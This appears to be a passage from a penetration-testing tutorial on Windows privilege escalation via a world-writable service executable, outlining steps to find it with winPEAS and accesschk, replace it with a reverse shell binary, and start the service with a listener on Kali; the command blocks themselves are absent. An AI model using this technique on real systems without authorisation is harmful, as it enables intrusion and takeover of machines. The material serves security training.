Insecure Service Executables
If the original service executable is modifiable by our user, we can simply replace it with our reverse shell executable. Remember to create a backup of the original executable if you are exploiting this in a real system!
Run winPEAS to check for service misconfigurations:

Note that the “filepermsvc” service has an executable which appears to be writable by everyone. We can confirm this with accesschk.exe:

Create a backup of the original service executable:
Copy the reverse shell executable to overwrite the service executable:

Start a listener on Kali, and then start the service to trigger the exploit:

Last updated